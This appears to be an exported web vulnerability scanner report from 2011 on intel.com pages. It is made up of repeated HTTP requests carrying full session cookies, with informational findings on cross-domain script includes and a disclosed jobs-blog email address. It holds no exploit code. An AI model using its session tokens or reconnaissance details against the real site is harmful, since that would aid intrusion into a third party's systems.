<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response dynamically includes the following script from another domain:
http://use.typekit.com/yhr6rfe.js
Request
GET /consumer/products/processors/core-family.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 46999
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response dynamically includes the following script from another domain:
http://use.typekit.com/yhr6rfe.js
Request
GET /consumer/products/processors/index.htm?iid=subhdr+products_proc HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38943
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
GET /consumer/products/processors/ratings.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44191
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response dynamically includes the following script from another domain:
http://use.typekit.com/yhr6rfe.js
Request
GET /consumer/products/technology/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36094
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
GET /consumer/shop/processors/index.htm?iid=subhdr+shop_proc HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:06 GMT Content-Length: 29190 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
GET /consumer/shop/ssds.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:06 GMT Content-Length: 27030 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response dynamically includes the following script from another domain:
http://widgets.twimg.com/j/2/widget.js
Request
GET /en_CA/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:14 GMT Content-Length: 27143 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <meta http-equiv=Content-Type content="text/html; charset=utf- ...[SNIP]... <div style="margin-left: 3px;"> <script src="http://widgets.twimg.com/j/2/widget.js"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://use.typekit.com/yhr6rfe.js
Request
GET /en_SA/consumer/products/processors/index.htm?iid=gg_en_EG+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39045
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-SA" lang="en-SA">
GET /itcenter/products/core/core_vpro/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47688
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /view_play_list?p=698CFFD6A87A1ACB HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:32:33 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Connection: close
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
GET /jobs/ HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:21 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 CacheHit: D=5205 t=1296947781468896 Connection: close Content-Length: 42181
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
GET /jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php HTTP/1.1 Host: blogs.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:16:18 GMT Server: Apache Content-Type: text/html; charset=UTF-8 CacheHit: D=7024 t=1296947778767507 Vary: Accept-Encoding Connection: close Content-Length: 34050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">
The following email address was disclosed in the response:
JobsBlog@intel.com
Request
